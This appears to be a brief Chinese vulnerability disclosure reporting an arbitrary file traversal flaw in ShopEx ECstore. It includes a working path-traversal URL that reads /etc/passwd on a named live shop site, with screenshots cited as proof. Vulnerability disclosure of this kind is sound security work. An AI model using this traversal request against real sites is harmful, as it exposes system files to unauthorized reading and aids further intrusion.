### 简要描述:
ShopE旗下产品ECstore任意文件遍历漏洞
### 详细说明:
官方主站:
http://ecstore.shopex.cn/
在官方宣传上有成功案例:
[<img src="https://images.seebug.org/upload/201402/05185018e5b4dedc896c5dd86b2405c23b358196.jpg" alt="2-1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201402/05185018e5b4dedc896c5dd86b2405c23b358196.jpg)
http://mall.brands.com.tw/ec
http://mall.brands.com.tw/ec/index.php/tools-staticPage.html?filename=../../../../../../../../../../etc/passwd
[<img src="https://images.seebug.org/upload/201402/0518520260dd1230b7c37c906aeb0e178dd81949.jpg" alt="2-2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201402/0518520260dd1230b7c37c906aeb0e178dd81949.jpg)
### 漏洞证明:
[<img src="https://images.seebug.org/upload/201402/05185247da60c363556bf35d459505167f3489fa.jpg" alt="2-3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201402/05185247da60c363556bf35d459505167f3489fa.jpg)
[<img src="https://images.seebug.org/upload/201402/051854487827505debc7454b71942721d30ef41b.jpg" alt="2-4.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201402/051854487827505debc7454b71942721d30ef41b.jpg)
京公网安备 11010502034610号
暂无评论